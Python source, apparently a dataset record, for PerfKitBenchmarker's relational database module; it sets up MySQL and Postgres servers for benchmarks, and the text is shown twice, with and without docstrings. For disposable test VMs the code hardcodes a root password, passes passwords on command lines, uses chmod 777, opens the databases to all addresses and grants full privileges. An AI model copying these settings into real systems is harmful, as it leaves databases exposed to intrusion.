'Machine type of the client VM must be set.')
if FLAGS.db_flags:
metadata.update({
'db_flags': FLAGS.db_flags,
})
return metadata
@abstractmethod
def GetDefaultEngineVersion(self, engine):
"""Return the default version (for PKB) for the given database engine.
Args:
engine: name of the database engine
Returns: default version as a string for the given engine.
"""
def _PostCreate(self):
self._ApplyDbFlags()
def _IsReadyUnmanaged(self):
"""Return true if the underlying resource is ready.
Returns:
True if MySQL was installed successfully, False if not.
Raises:
Exception: If this method is called when the database is a managed one.
Shouldn't happen.
"""
if self.is_managed_db:
raise Exception('Checking state of unmanaged database when the database '
'is managed.')
if self.spec.engine == 'mysql':
if (self.spec.engine_version == '5.6' or
self.spec.engine_version.startswith('5.6.')):
mysql_name = 'mysql56'
elif (self.spec.engine_version == '5.7' or
self.spec.engine_version.startswith('5.7.')):
mysql_name = 'mysql57'
elif (self.spec.engine_version == '8.0' or
self.spec.engine_version.startswith('8.0.')):
mysql_name = 'mysql80'
else:
raise Exception('Invalid database engine version: %s. Only 5.6 and 5.7 '
'and 8.0 are supported.' % self.spec.engine_version)
stdout, stderr = self.server_vm.RemoteCommand(
'sudo service %s status' % self.server_vm.GetServiceName(mysql_name))
return stdout and not stderr
elif self.spec.engine == 'postgres':
stdout, stderr = self.server_vm.RemoteCommand(
'sudo service postgresql status')
return stdout and not stderr
raise UnsupportedError('%s engine is not supported '
'for unmanaged database.' % self.spec.engine)
def _InstallMySQLClient(self):
"""Installs MySQL Client on the client vm.
Raises:
Exception: If the requested engine version is unsupported.
"""
if (self.spec.engine_version == '5.6' or
self.spec.engine_version.startswith('5.6.')):
mysql_name = 'mysqlclient56'
elif (self.spec.engine_version == '5.7' or
self.spec.engine_version.startswith('5.7') or
self.spec.engine_version == '8.0' or
self.spec.engine_version.startswith('8.0')):
mysql_name = 'mysqlclient'
else:
raise Exception('Invalid database engine version: %s. Only 5.6, 5.7 '
'and 8.0 are supported.' % self.spec.engine_version)
self.client_vm.Install(mysql_name)
self.client_vm.RemoteCommand(
'sudo sed -i '
'"s/max_allowed_packet\t= 16M/max_allowed_packet\t= 1024M/g" %s' %
self.client_vm.GetPathToConfig(mysql_name))
self.client_vm.RemoteCommand(
'sudo cat %s' % self.client_vm.GetPathToConfig(mysql_name),
should_log=True)
def _PrepareDataDirectories(self, mysql_name):
# Make the data directories in case they don't already exist.
self.server_vm.RemoteCommand('sudo mkdir -p /scratch/mysql')
self.server_vm.RemoteCommand('sudo mkdir -p /scratch/tmp')
self.server_vm.RemoteCommand('sudo chown mysql:mysql /scratch/mysql')
self.server_vm.RemoteCommand('sudo chown mysql:mysql /scratch/tmp')
# Copy all the contents of the default data directories to the new ones.
self.server_vm.RemoteCommand(
'sudo rsync -avzh /var/lib/mysql/ /scratch/mysql')
self.server_vm.RemoteCommand('sudo rsync -avzh /tmp/ /scratch/tmp')
self.server_vm.RemoteCommand('df', should_log=True)
# Configure AppArmor.
self.server_vm.RemoteCommand(
'echo "alias /var/lib/mysql -> /scratch/mysql," | sudo tee -a '
'/etc/apparmor.d/tunables/alias')
self.server_vm.RemoteCommand(
'echo "alias /tmp -> /scratch/tmp," | sudo tee -a '
'/etc/apparmor.d/tunables/alias')
self.server_vm.RemoteCommand(
'sudo sed -i '
'"s|# Allow data files dir access|'
' /scratch/mysql/ r, /scratch/mysql/** rwk, /scratch/tmp/ r, '
'/scratch/tmp/** rwk, /proc/*/status r, '
'/sys/devices/system/node/ r, /sys/devices/system/node/node*/meminfo r,'
' /sys/devices/system/node/*/* r, /sys/devices/system/node/* r, '
'# Allow data files dir access|g" /etc/apparmor.d/usr.sbin.mysqld')
self.server_vm.RemoteCommand(
'sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.mysqld')
self.server_vm.RemoteCommand('sudo systemctl restart apparmor')
# Finally, change the MySQL data directory.
self.server_vm.RemoteCommand(
'sudo sed -i '
'"s|datadir\t\t= /var/lib/mysql|datadir\t\t= /scratch/mysql|g" '
'%s' % self.server_vm.GetPathToConfig(mysql_name))
self.server_vm.RemoteCommand(
'sudo sed -i '
'"s|tmpdir\t\t= /tmp|tmpdir\t\t= /scratch/tmp|g" '
'%s' % self.server_vm.GetPathToConfig(mysql_name))
def _SetupUnmanagedDatabase(self):
"""Installs unmanaged databases on server vm."""
db_engine = self.spec.engine
if self.client_vm.IS_REBOOTABLE:
self.client_vm.ApplySysctlPersistent({
'net.ipv4.tcp_keepalive_time': 100,
'net.ipv4.tcp_keepalive_intvl': 100,
'net.ipv4.tcp_keepalive_probes': 10
})
if self.server_vm.IS_REBOOTABLE:
self.server_vm.ApplySysctlPersistent({
'net.ipv4.tcp_keepalive_time': 100,
'net.ipv4.tcp_keepalive_intvl': 100,
'net.ipv4.tcp_keepalive_probes': 10
})
if db_engine == 'mysql':
self._InstallMySQLServer()
elif db_engine == 'postgres':
self._InstallPostgresServer()
else:
raise Exception(
'Engine {0} not supported for unmanaged databases.'.format(
self.spec.engine))
def _InstallPostgresServer(self):
if self.spec.engine_version == POSTGRES_13_VERSION:
self.server_vm.Install('postgres13')
else:
raise UnsupportedError('Only postgres version 13 is currently supported')
vm = self.server_vm
version = self.spec.engine_version
postgres_conf_path = POSTGRES_CONFIG_PATH.format(version)
postgres_conf_file = postgres_conf_path + POSTGRES_CONFIG
postgres_hba_conf_file = postgres_conf_path + POSTGRES_HBA_CONFIG
vm.PushFile(data.ResourcePath(
posixpath.join(POSTGRES_RESOURCE_PATH, POSTGRES_HBA_CONFIG)))
vm.RemoteCommand('sudo -u postgres psql postgres -c '
'"ALTER USER postgres PASSWORD \'%s\';"'
% self.spec.database_password)
vm.RemoteCommand('sudo -u postgres psql postgres -c '
'"CREATE ROLE %s LOGIN SUPERUSER PASSWORD \'%s\';"' %
(self.spec.database_username,
self.spec.database_password))
# Change the directory to scratch
vm.RemoteCommand(
'sudo sed -i.bak '
'"s:\'/var/lib/postgresql/{0}/main\':\'{1}/postgresql/{0}/main\':" '
'/etc/postgresql/{0}/main/postgresql.conf'.format(
version, self.server_vm.GetScratchDir()))
# Accept remote connection
vm.RemoteCommand(
'sudo sed -i.bak '
r'"s:\#listen_addresses ='
' \'localhost\':listen_addresses = \'*\':" '
'{}'.format(postgres_conf_file))
# Set the size of the shared buffer
vm.RemoteCommand(
'sudo sed -i.bak "s:#shared_buffers = 128MB:shared_buffers = {}GB:" '
'{}'.format(self.postgres_shared_buffer_size, postgres_conf_file))
# Update data path to new location
vm.RemoteCommand('sudo rsync -av /var/lib/postgresql /scratch')
# # Use cat to move files because mv will override file permissions
self.server_vm.RemoteCommand(
"sudo bash -c "
"'cat pg_hba.conf > "
"{}'".format(postgres_hba_conf_file))
self.server_vm.RemoteCommand(
'sudo cat {}'.format(postgres_conf_file))
self.server_vm.RemoteCommand(
'sudo cat {}'.format(postgres_hba_conf_file))
vm.RemoteCommand('sudo systemctl restart postgresql')
def _InstallMySQLServer(self):
"""Installs MySQL Server on the server vm.
https://d0.awsstatic.com/whitepapers/Database/optimizing-mysql-running-on-amazon-ec2-using-amazon-ebs.pdf
for minimal tuning parameters.
Raises:
Exception: If the requested engine version is unsupported, or if this
method is called when the database is a managed one. The latter
shouldn't happen.
"""
if (self.spec.engine_version == '5.6' or
self.spec.engine_version.startswith('5.6.')):
mysql_name = 'mysql56'
elif (self.spec.engine_version == '5.7' or
self.spec.engine_version.startswith('5.7.')):
mysql_name = 'mysql57'
elif (self.spec.engine_version == '8.0' or
self.spec.engine_version.startswith('8.0.')):
mysql_name = 'mysql80'
else:
raise Exception('Invalid database engine version: %s. Only 5.6 and 5.7 '
'and 8.0 are supported.' % self.spec.engine_version)
self.server_vm.Install(mysql_name)
self.server_vm.RemoteCommand('chmod 777 %s' %
self.server_vm.GetScratchDir())
self.server_vm.RemoteCommand('sudo service %s stop' %
self.server_vm.GetServiceName(mysql_name))
self._PrepareDataDirectories(mysql_name)
# Minimal MySQL tuning; see AWS whitepaper in docstring.
innodb_buffer_pool_gb = self.innodb_buffer_pool_size
innodb_log_file_mb = self.innodb_log_file_size
self.server_vm.RemoteCommand(
'echo "\n'
f'innodb_buffer_pool_size = {innodb_buffer_pool_gb}G\n'
'innodb_flush_method = O_DIRECT\n'
'innodb_flush_neighbors = 0\n'
f'innodb_log_file_size = {innodb_log_file_mb}M'
'" | sudo tee -a %s' % self.server_vm.GetPathToConfig(mysql_name))
if self.mysql_bin_log:
self.server_vm.RemoteCommand('echo "\n'
'server-id = 1\n'
'log_bin = /var/log/mysql/mysql-bin.log\n'
'" | sudo tee -a %s' %
self.server_vm.GetPathToConfig(mysql_name))
# These (and max_connections after restarting) help avoid losing connection.
self.server_vm.RemoteCommand(
'echo "\nskip-name-resolve\n'
'connect_timeout = 86400\n'
'wait_timeout = 86400\n'
'interactive_timeout = 86400" | sudo tee -a %s' %
self.server_vm.GetPathToConfig(mysql_name))
self.server_vm.RemoteCommand('sudo sed -i "s/bind-address/#bind-address/g" '
'%s' %
self.server_vm.GetPathToConfig(mysql_name))
self.server_vm.RemoteCommand(
'sudo sed -i '
'"s/max_allowed_packet\t= 16M/max_allowed_packet\t= 1024M/g" %s' %
self.server_vm.GetPathToConfig(mysql_name))
# Configure logging (/var/log/mysql/error.log will print upon db deletion).
self.server_vm.RemoteCommand(
'echo "\nlog_error_verbosity = 3" | sudo tee -a %s' %
self.server_vm.GetPathToConfig(mysql_name))
self.server_vm.RemoteCommand(
'sudo cat /etc/mysql/mysql.conf.d/mysql.sock',
should_log=True,
ignore_failure=True)
# Restart.
self.server_vm.RemoteCommand('sudo service %s restart' %
self.server_vm.GetServiceName(mysql_name))
self.server_vm.RemoteCommand(
'sudo cat %s' % self.server_vm.GetPathToConfig(mysql_name),
should_log=True)
self.server_vm.RemoteCommand(
self.MakeMysqlCommand(
'SET GLOBAL max_connections=8000;', use_localhost=True))
if FLAGS.ip_addresses == vm_util.IpAddressSubset.INTERNAL:
client_ip = self.client_vm.internal_ip
else:
client_ip = self.client_vm.ip_address
self.server_vm.RemoteCommand(
self.MakeMysqlCommand(
'CREATE USER \'%s\'@\'%s\' IDENTIFIED BY \'%s\';' %
(self.spec.database_username, client_ip,
self.spec.database_password),
use_localhost=True))
self.server_vm.RemoteCommand(
self.MakeMysqlCommand(
'GRANT ALL PRIVILEGES ON *.* TO \'%s\'@\'%s\';' %
(self.spec.database_username, client_ip),
use_localhost=True))
self.server_vm.RemoteCommand(
self.MakeMysqlCommand('FLUSH PRIVILEGES;', use_localhost=True))
def _ApplyDbFlags(self):
"""Apply Flags on the database."""
if FLAGS.db_flags:
if self.is_managed_db:
self._ApplyManagedDbFlags()
else:
if self.spec.engine == MYSQL:
self._ApplyMySqlFlags()
else:
raise NotImplementedError('Flags is not supported on %s' %
self.spec.engine)
def _ApplyManagedDbFlags(self):
"""Apply flags on the managed database."""
raise NotImplementedError('Managed Db flags is not supported for %s' %
type(self).__name__)
def _ApplyMySqlFlags(self):
if FLAGS.db_flags:
for flag in FLAGS.db_flags:
cmd = self.MakeMysqlCommand('SET %s;' % flag)
_, stderr, _ = vm_util.IssueCommand(cmd, raise_on_failure=False)
if stderr:
raise Exception('Invalid MySQL flags: %s' % stderr)
def PrintUnmanagedDbStats(self):
"""Print server logs on unmanaged db."""
if self.spec.engine == 'mysql':
self.server_vm.RemoteCommand('sudo cat /var/log/mysql/error.log')
self.server_vm.RemoteCommand(
'mysql %s -e "SHOW GLOBAL STATUS LIKE \'Aborted_connects\';"' %
self.MakeMysqlConnectionString(use_localhost=True))
self.server_vm.RemoteCommand(
'mysql %s -e "SHOW GLOBAL STATUS LIKE \'Aborted_clients\';"' %
self.MakeMysqlConnectionString(use_localhost=True))
def Failover(self):
"""Fail over the database. Throws exception if not high available."""
if not self.spec.high_availability:
raise Exception('Attempt to fail over a database that isn\'t marked '
'as high available')
self._FailoverHA()
@abstractmethod
def _FailoverHA(self):
"""Fail over from master to replica."""
pass
| 38.094872 | 117 | 0.658276 |
from abc import abstractmethod
import posixpath
import random
import re
import string
import uuid
from absl import flags
from perfkitbenchmarker import data
from perfkitbenchmarker import resource
from perfkitbenchmarker import vm_util
import six
flags.DEFINE_string('managed_db_engine', None,
'Managed database flavor to use (mysql, postgres)')
flags.DEFINE_string('managed_db_engine_version', None,
'Version of the database flavor selected, e.g. 5.7')
flags.DEFINE_string('managed_db_database_name', None,
'Name of the database to create. Defaults to '
'pkb-db-[run-uri]')
flags.DEFINE_string('managed_db_database_username', None,
'Database username. Defaults to '
'pkb-db-user-[run-uri]')
flags.DEFINE_string('managed_db_database_password', None,
'Database password. Defaults to '
'a random 10-character alpha-numeric string')
flags.DEFINE_boolean('managed_db_high_availability', False,
'Specifies if the database should be high availability')
flags.DEFINE_boolean('managed_db_backup_enabled', True,
'Whether or not to enable automated backups')
flags.DEFINE_string('managed_db_backup_start_time', '07:00',
'Time in UTC that automated backups (if enabled) '
'will be scheduled. In the form HH:MM UTC. '
'Defaults to 07:00 UTC')
flags.DEFINE_list('managed_db_zone', None,
'zone or region to launch the database in. '
'Defaults to the client vm\'s zone.')
flags.DEFINE_string('client_vm_zone', None,
'zone or region to launch the client in. ')
flags.DEFINE_string('managed_db_machine_type', None,
'Machine type of the database.')
flags.DEFINE_integer('managed_db_cpus', None,
'Number of Cpus in the database.')
flags.DEFINE_string('managed_db_memory', None,
'Amount of Memory in the database. Uses the same format '
'string as custom machine memory type.')
flags.DEFINE_integer('managed_db_disk_size', None,
'Size of the database disk in GB.')
flags.DEFINE_string('managed_db_disk_type', None, 'Disk type of the database.')
flags.DEFINE_integer('managed_db_disk_iops', None,
'Disk iops of the database on AWS io1 disks.')
flags.DEFINE_integer('managed_db_azure_compute_units', None,
'Number of Dtus in the database.')
flags.DEFINE_string('managed_db_tier', None,
'Tier in azure. (Basic, Standard, Premium).')
flags.DEFINE_string('client_vm_machine_type', None,
'Machine type of the client vm.')
flags.DEFINE_integer('client_vm_cpus', None, 'Number of Cpus in the client vm.')
flags.DEFINE_string(
'client_vm_memory', None,
'Amount of Memory in the vm. Uses the same format '
'string as custom machine memory type.')
flags.DEFINE_integer('client_vm_disk_size', None,
'Size of the client vm disk in GB.')
flags.DEFINE_string('client_vm_disk_type', None, 'Disk type of the client vm.')
flags.DEFINE_integer('client_vm_disk_iops', None,
'Disk iops of the database on AWS for client vm.')
flags.DEFINE_boolean(
'use_managed_db', True, 'If true, uses the managed MySql '
'service for the requested cloud provider. If false, uses '
'MySql installed on a VM.')
flags.DEFINE_list(
'db_flags', '', 'Flags to apply to the implementation of '
'MySQL on the cloud that\'s being used. Example: '
'binlog_cache_size=4096,innodb_log_buffer_size=4294967295')
flags.DEFINE_integer(
'innodb_buffer_pool_size', None,
'Size of the innodb buffer pool size in GB. '
'Defaults to 25% of VM memory if unset')
flags.DEFINE_bool(
'mysql_bin_log', False,
'Flag to turn binary logging on. '
'Defaults to False')
flags.DEFINE_integer('innodb_log_file_size', 1000,
'Size of the log file in MB. Defaults to 1000M.')
flags.DEFINE_integer(
'postgres_shared_buffer_size', None,
'Size of the shared buffer size in GB. '
'Defaults to 25% of VM memory if unset')
BACKUP_TIME_REGULAR_EXPRESSION = '^\d\d\:\d\d$'
flags.register_validator(
'managed_db_backup_start_time',
lambda value: re.search(BACKUP_TIME_REGULAR_EXPRESSION, value) is not None,
message=('--database_backup_start_time must be in the form HH:MM'))
MYSQL = 'mysql'
POSTGRES = 'postgres'
AURORA_POSTGRES = 'aurora-postgresql'
AURORA_MYSQL = 'aurora-mysql'
AURORA_MYSQL56 = 'aurora'
SQLSERVER = 'sqlserver'
SQLSERVER_EXPRESS = 'sqlserver-ex'
SQLSERVER_ENTERPRISE = 'sqlserver-ee'
SQLSERVER_STANDARD = 'sqlserver-se'
ALL_ENGINES = [
MYSQL,
POSTGRES,
AURORA_POSTGRES,
AURORA_MYSQL,
AURORA_MYSQL56,
SQLSERVER,
SQLSERVER_EXPRESS,
SQLSERVER_ENTERPRISE,
SQLSERVER_STANDARD
]
FLAGS = flags.FLAGS
POSTGRES_13_VERSION = '13'
POSTGRES_RESOURCE_PATH = 'database_configurations/postgres'
POSTGRES_HBA_CONFIG = 'pg_hba.conf'
POSTGRES_CONFIG = 'postgresql.conf'
POSTGRES_CONFIG_PATH = '/etc/postgresql/{0}/main/'
class RelationalDbPropertyNotSet(Exception):
pass
class RelationalDbEngineNotFoundException(Exception):
pass
class UnsupportedError(Exception):
pass
def GenerateRandomDbPassword():
prefix = [random.choice(string.ascii_lowercase),
random.choice(string.ascii_uppercase),
random.choice(string.digits)]
return ''.join(prefix) + str(uuid.uuid4())[:10]
def GetRelationalDbClass(cloud):
return resource.GetResourceClass(BaseRelationalDb, CLOUD=cloud)
def VmsToBoot(vm_groups):
return {
name: spec
for name, spec in six.iteritems(vm_groups)
if name == 'clients' or name == 'default' or
(not FLAGS.use_managed_db and name == 'servers')
}
class BaseRelationalDb(resource.BaseResource):
RESOURCE_TYPE = 'BaseRelationalDb'
def __init__(self, relational_db_spec):
super(BaseRelationalDb, self).__init__()
self.spec = relational_db_spec
if not FLAGS.use_managed_db:
if self.spec.high_availability:
raise UnsupportedError('High availability is unsupported for unmanaged '
'databases.')
self.endpoint = ''
self.spec.database_username = 'root'
self.spec.database_password = 'perfkitbenchmarker'
self.innodb_buffer_pool_size = FLAGS.innodb_buffer_pool_size
self.mysql_bin_log = FLAGS.mysql_bin_log
self.innodb_log_file_size = FLAGS.innodb_log_file_size
self.postgres_shared_buffer_size = FLAGS.postgres_shared_buffer_size
self.is_managed_db = False
else:
self.is_managed_db = True
@property
def client_vm(self):
if not hasattr(self, '_client_vm'):
raise RelationalDbPropertyNotSet('client_vm is not set')
return self._client_vm
@client_vm.setter
def client_vm(self, client_vm):
self._client_vm = client_vm
@property
def server_vm(self):
if not hasattr(self, '_server_vm'):
raise RelationalDbPropertyNotSet('server_vm is not set')
return self._server_vm
@server_vm.setter
def server_vm(self, server_vm):
self._server_vm = server_vm
def SetVms(self, vm_groups):
self.client_vm = vm_groups['clients' if 'clients' in
vm_groups else 'default'][0]
if not self.is_managed_db and 'servers' in vm_groups:
self.server_vm = vm_groups['servers'][0]
kb_to_gb = 1.0 / 1000000
if not self.innodb_buffer_pool_size:
self.innodb_buffer_pool_size = int(self.server_vm.total_memory_kb *
kb_to_gb / 4)
if not self.postgres_shared_buffer_size:
self.postgres_shared_buffer_size = int(self.server_vm.total_memory_kb *
kb_to_gb / 4)
def MakePsqlConnectionString(self, database_name, use_localhost=False):
return '\'host={0} user={1} password={2} dbname={3}\''.format(
self.endpoint if not use_localhost else 'localhost',
self.spec.database_username, self.spec.database_password, database_name)
def MakeMysqlConnectionString(self, use_localhost=False):
return '-h {0}{1} -u {2} -p{3}'.format(
self.endpoint if not use_localhost else 'localhost',
' -P 3306' if not self.is_managed_db else '',
self.spec.database_username, self.spec.database_password)
def MakeSysbenchConnectionString(self):
return (
'--mysql-host={0}{1} --mysql-user={2} --mysql-password="{3}" ').format(
self.endpoint,
' --mysql-port=3306' if not self.is_managed_db else '',
self.spec.database_username, self.spec.database_password)
def MakeMysqlCommand(self, command, use_localhost=False):
return 'mysql %s -e "%s"' % (self.MakeMysqlConnectionString(
use_localhost=use_localhost), command)
def MakeSqlserverCommand(self, command, use_localhost=False):
return '/opt/mssql-tools/bin/sqlcmd -S %s -U %s -P %s -Q "%s"' % (
self.endpoint if not use_localhost else 'localhost',
self.spec.database_username, self.spec.database_password, command)
def MakePostgresCommand(self, db_name, command, use_localhost=False):
return 'psql %s -c "%s"' % (self.MakePsqlConnectionString(
db_name, use_localhost), command)
@property
def endpoint(self):
if not hasattr(self, '_endpoint'):
raise RelationalDbPropertyNotSet('endpoint not set')
return self._endpoint
@endpoint.setter
def endpoint(self, endpoint):
self._endpoint = endpoint
@property
def port(self):
if not hasattr(self, '_port'):
raise RelationalDbPropertyNotSet('port not set')
return self._port
@port.setter
def port(self, port):
self._port = int(port)
def GetResourceMetadata(self):
metadata = {
'zone': self.spec.db_spec.zone,
'disk_type': self.spec.db_disk_spec.disk_type,
'disk_size': self.spec.db_disk_spec.disk_size,
'engine': self.spec.engine,
'high_availability': self.spec.high_availability,
'backup_enabled': self.spec.backup_enabled,
'backup_start_time': self.spec.backup_start_time,
'engine_version': self.spec.engine_version,
'client_vm_zone': self.spec.vm_groups['clients'].vm_spec.zone,
'use_managed_db': self.is_managed_db,
'instance_id': self.instance_id,
'client_vm_disk_type':
self.spec.vm_groups['clients'].disk_spec.disk_type,
'client_vm_disk_size':
self.spec.vm_groups['clients'].disk_spec.disk_size,
}
if not self.is_managed_db and self.spec.engine == 'mysql':
metadata.update({
'unmanaged_db_innodb_buffer_pool_size_gb':
self.innodb_buffer_pool_size,
'unmanaged_db_innodb_log_file_size_mb':
self.innodb_log_file_size,
'unmanaged_db_mysql_bin_log':
self.mysql_bin_log
})
if not self.is_managed_db and self.spec.engine == 'postgres':
metadata.update({
'postgres_shared_buffer_size':
self.postgres_shared_buffer_size
})
if (hasattr(self.spec.db_spec, 'machine_type') and
self.spec.db_spec.machine_type):
metadata.update({
'machine_type': self.spec.db_spec.machine_type,
})
elif hasattr(self.spec.db_spec, 'cpus') and (hasattr(
self.spec.db_spec, 'memory')):
metadata.update({
'cpus': self.spec.db_spec.cpus,
})
metadata.update({
'memory': self.spec.db_spec.memory,
})
elif hasattr(self.spec.db_spec, 'tier') and (hasattr(
self.spec.db_spec, 'compute_units')):
metadata.update({
'tier': self.spec.db_spec.tier,
})
metadata.update({
'compute_units': self.spec.db_spec.compute_units,
})
else:
raise RelationalDbPropertyNotSet(
'Machine type of the database must be set.')
if (hasattr(self.spec.vm_groups['clients'].vm_spec, 'machine_type') and
self.spec.vm_groups['clients'].vm_spec.machine_type):
metadata.update({
'client_vm_machine_type':
self.spec.vm_groups['clients'].vm_spec.machine_type,
})
elif hasattr(self.spec.vm_groups['clients'].vm_spec, 'cpus') and (hasattr(
self.spec.vm_groups['clients'].vm_spec, 'memory')):
metadata.update({
'client_vm_cpus': self.spec.vm_groups['clients'].vm_spec.cpus,
})
metadata.update({
'client_vm_memory': self.spec.vm_groups['clients'].vm_spec.memory,
})
else:
raise RelationalDbPropertyNotSet(
'Machine type of the client VM must be set.')
if FLAGS.db_flags:
metadata.update({
'db_flags': FLAGS.db_flags,
})
return metadata
@abstractmethod
def GetDefaultEngineVersion(self, engine):
def _PostCreate(self):
self._ApplyDbFlags()
def _IsReadyUnmanaged(self):
if self.is_managed_db:
raise Exception('Checking state of unmanaged database when the database '
'is managed.')
if self.spec.engine == 'mysql':
if (self.spec.engine_version == '5.6' or
self.spec.engine_version.startswith('5.6.')):
mysql_name = 'mysql56'
elif (self.spec.engine_version == '5.7' or
self.spec.engine_version.startswith('5.7.')):
mysql_name = 'mysql57'
elif (self.spec.engine_version == '8.0' or
self.spec.engine_version.startswith('8.0.')):
mysql_name = 'mysql80'
else:
raise Exception('Invalid database engine version: %s. Only 5.6 and 5.7 '
'and 8.0 are supported.' % self.spec.engine_version)
stdout, stderr = self.server_vm.RemoteCommand(
'sudo service %s status' % self.server_vm.GetServiceName(mysql_name))
return stdout and not stderr
elif self.spec.engine == 'postgres':
stdout, stderr = self.server_vm.RemoteCommand(
'sudo service postgresql status')
return stdout and not stderr
raise UnsupportedError('%s engine is not supported '
'for unmanaged database.' % self.spec.engine)
def _InstallMySQLClient(self):
if (self.spec.engine_version == '5.6' or
self.spec.engine_version.startswith('5.6.')):
mysql_name = 'mysqlclient56'
elif (self.spec.engine_version == '5.7' or
self.spec.engine_version.startswith('5.7') or
self.spec.engine_version == '8.0' or
self.spec.engine_version.startswith('8.0')):
mysql_name = 'mysqlclient'
else:
raise Exception('Invalid database engine version: %s. Only 5.6, 5.7 '
'and 8.0 are supported.' % self.spec.engine_version)
self.client_vm.Install(mysql_name)
self.client_vm.RemoteCommand(
'sudo sed -i '
'"s/max_allowed_packet\t= 16M/max_allowed_packet\t= 1024M/g" %s' %
self.client_vm.GetPathToConfig(mysql_name))
self.client_vm.RemoteCommand(
'sudo cat %s' % self.client_vm.GetPathToConfig(mysql_name),
should_log=True)
def _PrepareDataDirectories(self, mysql_name):
self.server_vm.RemoteCommand('sudo mkdir -p /scratch/mysql')
self.server_vm.RemoteCommand('sudo mkdir -p /scratch/tmp')
self.server_vm.RemoteCommand('sudo chown mysql:mysql /scratch/mysql')
self.server_vm.RemoteCommand('sudo chown mysql:mysql /scratch/tmp')
# Copy all the contents of the default data directories to the new ones.
self.server_vm.RemoteCommand(
'sudo rsync -avzh /var/lib/mysql/ /scratch/mysql')
self.server_vm.RemoteCommand('sudo rsync -avzh /tmp/ /scratch/tmp')
self.server_vm.RemoteCommand('df', should_log=True)
# Configure AppArmor.
self.server_vm.RemoteCommand(
'echo "alias /var/lib/mysql -> /scratch/mysql," | sudo tee -a '
'/etc/apparmor.d/tunables/alias')
self.server_vm.RemoteCommand(
'echo "alias /tmp -> /scratch/tmp," | sudo tee -a '
'/etc/apparmor.d/tunables/alias')
self.server_vm.RemoteCommand(
'sudo sed -i '
'"s|# Allow data files dir access|'
' /scratch/mysql/ r, /scratch/mysql/** rwk, /scratch/tmp/ r, '
'/scratch/tmp/** rwk, /proc/*/status r, '
'/sys/devices/system/node/ r, /sys/devices/system/node/node*/meminfo r,'
' /sys/devices/system/node/*/* r, /sys/devices/system/node/* r, '
'# Allow data files dir access|g" /etc/apparmor.d/usr.sbin.mysqld')
self.server_vm.RemoteCommand(
'sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.mysqld')
self.server_vm.RemoteCommand('sudo systemctl restart apparmor')
# Finally, change the MySQL data directory.
self.server_vm.RemoteCommand(
'sudo sed -i '
'"s|datadir\t\t= /var/lib/mysql|datadir\t\t= /scratch/mysql|g" '
'%s' % self.server_vm.GetPathToConfig(mysql_name))
self.server_vm.RemoteCommand(
'sudo sed -i '
'"s|tmpdir\t\t= /tmp|tmpdir\t\t= /scratch/tmp|g" '
'%s' % self.server_vm.GetPathToConfig(mysql_name))
def _SetupUnmanagedDatabase(self):
db_engine = self.spec.engine
if self.client_vm.IS_REBOOTABLE:
self.client_vm.ApplySysctlPersistent({
'net.ipv4.tcp_keepalive_time': 100,
'net.ipv4.tcp_keepalive_intvl': 100,
'net.ipv4.tcp_keepalive_probes': 10
})
if self.server_vm.IS_REBOOTABLE:
self.server_vm.ApplySysctlPersistent({
'net.ipv4.tcp_keepalive_time': 100,
'net.ipv4.tcp_keepalive_intvl': 100,
'net.ipv4.tcp_keepalive_probes': 10
})
if db_engine == 'mysql':
self._InstallMySQLServer()
elif db_engine == 'postgres':
self._InstallPostgresServer()
else:
raise Exception(
'Engine {0} not supported for unmanaged databases.'.format(
self.spec.engine))
def _InstallPostgresServer(self):
if self.spec.engine_version == POSTGRES_13_VERSION:
self.server_vm.Install('postgres13')
else:
raise UnsupportedError('Only postgres version 13 is currently supported')
vm = self.server_vm
version = self.spec.engine_version
postgres_conf_path = POSTGRES_CONFIG_PATH.format(version)
postgres_conf_file = postgres_conf_path + POSTGRES_CONFIG
postgres_hba_conf_file = postgres_conf_path + POSTGRES_HBA_CONFIG
vm.PushFile(data.ResourcePath(
posixpath.join(POSTGRES_RESOURCE_PATH, POSTGRES_HBA_CONFIG)))
vm.RemoteCommand('sudo -u postgres psql postgres -c '
'"ALTER USER postgres PASSWORD \'%s\';"'
% self.spec.database_password)
vm.RemoteCommand('sudo -u postgres psql postgres -c '
'"CREATE ROLE %s LOGIN SUPERUSER PASSWORD \'%s\';"' %
(self.spec.database_username,
self.spec.database_password))
# Change the directory to scratch
vm.RemoteCommand(
'sudo sed -i.bak '
'"s:\'/var/lib/postgresql/{0}/main\':\'{1}/postgresql/{0}/main\':" '
'/etc/postgresql/{0}/main/postgresql.conf'.format(
version, self.server_vm.GetScratchDir()))
# Accept remote connection
vm.RemoteCommand(
'sudo sed -i.bak '
r'"s:\#listen_addresses ='
' \'localhost\':listen_addresses = \'*\':" '
'{}'.format(postgres_conf_file))
# Set the size of the shared buffer
vm.RemoteCommand(
'sudo sed -i.bak "s:#shared_buffers = 128MB:shared_buffers = {}GB:" '
'{}'.format(self.postgres_shared_buffer_size, postgres_conf_file))
# Update data path to new location
vm.RemoteCommand('sudo rsync -av /var/lib/postgresql /scratch')
# # Use cat to move files because mv will override file permissions
self.server_vm.RemoteCommand(
"sudo bash -c "
"'cat pg_hba.conf > "
"{}'".format(postgres_hba_conf_file))
self.server_vm.RemoteCommand(
'sudo cat {}'.format(postgres_conf_file))
self.server_vm.RemoteCommand(
'sudo cat {}'.format(postgres_hba_conf_file))
vm.RemoteCommand('sudo systemctl restart postgresql')
def _InstallMySQLServer(self):
if (self.spec.engine_version == '5.6' or
self.spec.engine_version.startswith('5.6.')):
mysql_name = 'mysql56'
elif (self.spec.engine_version == '5.7' or
self.spec.engine_version.startswith('5.7.')):
mysql_name = 'mysql57'
elif (self.spec.engine_version == '8.0' or
self.spec.engine_version.startswith('8.0.')):
mysql_name = 'mysql80'
else:
raise Exception('Invalid database engine version: %s. Only 5.6 and 5.7 '
'and 8.0 are supported.' % self.spec.engine_version)
self.server_vm.Install(mysql_name)
self.server_vm.RemoteCommand('chmod 777 %s' %
self.server_vm.GetScratchDir())
self.server_vm.RemoteCommand('sudo service %s stop' %
self.server_vm.GetServiceName(mysql_name))
self._PrepareDataDirectories(mysql_name)
# Minimal MySQL tuning; see AWS whitepaper in docstring.
innodb_buffer_pool_gb = self.innodb_buffer_pool_size
innodb_log_file_mb = self.innodb_log_file_size
self.server_vm.RemoteCommand(
'echo "\n'
f'innodb_buffer_pool_size = {innodb_buffer_pool_gb}G\n'
'innodb_flush_method = O_DIRECT\n'
'innodb_flush_neighbors = 0\n'
f'innodb_log_file_size = {innodb_log_file_mb}M'
